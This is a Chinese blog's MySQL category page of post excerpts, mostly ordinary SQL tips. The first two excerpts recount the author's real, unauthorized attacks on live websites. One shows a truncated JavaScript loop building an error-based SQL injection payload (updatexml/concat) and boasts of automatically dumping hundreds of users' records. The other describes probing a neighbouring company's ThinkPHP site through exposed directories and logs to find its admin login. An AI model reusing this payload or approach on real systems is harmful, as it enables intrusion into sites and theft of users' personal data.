[MySQL]真实的曝库攻击
今天是真的曝了几个库,而且实现了全自动化记录数据。 一个网站可以曝出几百上千的用户信息,这下知道所谓的社工库怎么来的了吧: var bb=0; var logs = ""; for(i=1;i<400;i){ var username=new Array(); username[0] = "exp"; bb++; switch(bb){ case 1: username[1] = "-1 or updatexml(0,concat(0xa,(select concat("+i+",'+',username) from nqx_ucent...标签: MySQL
[MySQL]回家弄了个曝库攻击
公司隔壁是一家做图像识别的企业,去年才成立的,我最喜欢这种新鲜事物了,今天特意看了看他们的网站,用thinkphp框架做的。thinkphp有一些致命点,兴许他们没工夫处理呢。那今天就来检查检查吧。 首先,各个目录的列表权限——他们没有做处理,Application,Data,Runtime等目录一览无余,安装包都原封不动地躺在那,我清楚地看到他们改动了哪些文件。不过这些意义不是特别大,没有看到什么有价值的东西,有几个数据库脚本也只是原始安装文件。 然后,在Runtime目录下有日志文件,这个略有用,看到了登录后台,看到了登录用户‘Administrator’,而且用户只有一个,看到了一系...标签: MySQL
sqlite的使用
下载sqlite3.exe, 然后打开控制台运行之, sqlite3.exe .svn/wc.db "select * from work_queue"; 其中第一个参数是数据库文件,第二个参数是SQL语句; 嗯,应该还有更多用法,今天只这样了。标签: MySQL
[MySQL]insert和update的一些注意点
insert:对于已存在的主键出错; update:如果指定条件where,数据全部更新 update:更新全部数据的时候如果造成主键重复同样报错,没有主键的表就不会存在这个数据。 下面是一个测试用例: CREATE TABLE `test` ( `name` varchar(11) NOT NULL DEFAULT '', `passwd` varchar(255) DEFAULT NULL ) ENGINE=InnoDB DEFAULT CHARSET=utf8; select * from test; insert into test ...标签: MySQL
[MySQL]SQL中distinct的用法
SQL中distinct的用法 在表中,可能会包含重复值。这并不成问题,不过,有时您也许希望仅仅列出不同(distinct)的值。关键词 distinct用于返回唯一不同的值。 表A: id name 1 a 2 b 3 c 4 ...标签: MySQL
[MySQL]分页查询的三种方式
SQL中分页查询的方式,记录一下。方式有三种,各自特点就不说了。 CREATE TABLE 收藏表( `id` bigint(20) unsigned NOT NULL auto_increment COMMENT 'primary key', `uid` bigint(20) unsigned NOT NULL default 0 COMMENT 'uid',<br> `status` tinyint(3) un...标签: MySQL
[MySQL]MySQL联合查询语法内联、左联、右联、全联
MySQL联合查询效率较高,以下例子来说明联合查询(内联、左联、右联、全联)的好处: T1表结构(用户名,密码) userid(int) usernamevarchar(20) passwordvarchar(20) 1 jack jackpwd 2 owen owenpwd T2表结构(用户名,密码) userid(int) ...标签: MySQL
[MySQL]Failed to read auto-increment value from storage engine Query
一条数据插入数据库时报错:Failed to read auto-increment value from storage engine Query. 原因不详。 一种情况是自增字段数值达到最大值,这个我没有办法了。 另一种情况是自增字段还很小,像我的还是0,但也会出现这种问题,所以我不知道什么原因。解决方案是把这个字段的自增属性去掉,然后再重新加上。最好居然就可以了。标签: MySQL
日历
最新微语
- 有的时候,会站在分叉路口,不知道向左还是右
2023-12-26 15:34
- 繁花乱开,鸟雀逐风。心自宁静,纷扰不闻。
2023-03-14 09:56
- 对于不可控的事,我们保持乐观,对于可控的事情,我们保持谨慎。
2023-02-09 11:03
- 小时候,
暑假意味着无忧无虑地玩很长一段时间,
节假意味着好吃好喝还有很多长期不见的小朋友来玩...
长大后,
这是女儿第一个暑假,
一个半月...
2022-07-11 08:54
- Watching the autumn leaves falling as you grow older together
2018-10-25 09:45
分类
最新评论
- Goonog
i get it now :) - 萧
@Fluzak:The web host... - Fluzak
Nice blog here! Also... - Albertarive
In my opinion you co... - ChesterHep
What does it plan? - ChesterHep
No, opposite. - mojoheadz
Everything is OK!... - Josephmaigh
I just want to say t... - ChesterHep
What good topic - AnthonyBub
Certainly, never it ...